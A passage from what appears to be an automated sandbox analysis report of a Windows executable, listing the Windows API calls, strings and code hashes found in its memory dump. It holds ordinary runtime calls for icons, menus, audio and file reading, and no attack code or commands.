                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                  • API String ID: 3631882475-2268648507
                                                                                                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                  APIs
                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                  • SendMessageW.USER32 ref: 00471740
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                  • SendMessageW.USER32 ref: 0047184F
                                                                                                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116747274-0
                                                                                                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                  • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu$Sleep
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1196289194-4108050209
                                                                                                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 3300687185-3887548279
                                                                                                                  • Opcode ID: 5915239f1cc3fa451e500b5d78b6431c4bad1f67ebdff4f4acb1ca2ad161ff61
                                                                                                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                  • Opcode Fuzzy Hash: 5915239f1cc3fa451e500b5d78b6431c4bad1f67ebdff4f4acb1ca2ad161ff61
                                                                                                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 1976180769-4113822522
                                                                                                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 461458858-0
                                                                                                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                  • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3969911579-0
                                                                                                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 956284711-4108050209
                                                                                                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 1965227024-3771769585
                                                                                                                  • Opcode ID: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                                                                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                  • Opcode Fuzzy Hash: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                                                                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_memmove_wcslen
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 369157077-1007645807
                                                                                                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00445BF8
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                  • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 3125838495-3381328864
                                                                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CharNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1350042424-0
                                                                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                  • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
